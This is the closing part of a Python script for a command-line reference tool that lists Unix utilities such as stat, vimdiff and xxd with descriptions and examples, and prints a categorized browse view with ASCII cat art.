        {"name": "stat", "desc": "Display file status",
         "examples": ["stat /etc/passwd"]},
        {"name": "vimdiff", "desc": "Edit and compare files with vim",
         "examples": ["vimdiff file1 file2"]},
        {"name": "xxd", "desc": "Hex dump",
         "examples": ["xxd binary"]},
    ],
}

def print_browse():
    """Print neatly categorized list of all available tools."""
    print(r"""
      /\_/\
     ( o.o )    CLI Command Lookup
      > ^ <     ~~~~~~~~~~~~~~~~~~
     /_/ \_\
    """)
    print("=" * 60)
    print("   CLI COMMAND LOOKUP — Categories & Tools")
    print("=" * 60)
    for category, tools in DATA.items():
        print(f"\n─── {category} ───")
        for tool in tools:
            print(f"  {tool['name']:<25} {tool['desc']}")
    print("\n[Tip] Run: python cli_fer <tool_name>  for flags and examples.")
    print(r"""
      /\_/\
     ( ^.^ )   Be curious, human!
      >   <
    """)

# ----------------------------------------------------------------------
# MAIN
# ----------------------------------------------------------------------
def main():
    if len(sys.argv) == 1:
        print_browse()
    elif len(sys.argv) == 2:
        arg = sys.argv[1]
        if arg in ("-h", "--help"):
            print("Usage:")
            print("  python cli_fer               browse all categories and tools")
            print("  python cli_fer <tool_name>   show flags and examples")
        else:
            print_tool(arg)
    else:
        print("Too many arguments. Use -h for help.")

if __name__ == "__main__":
    main()
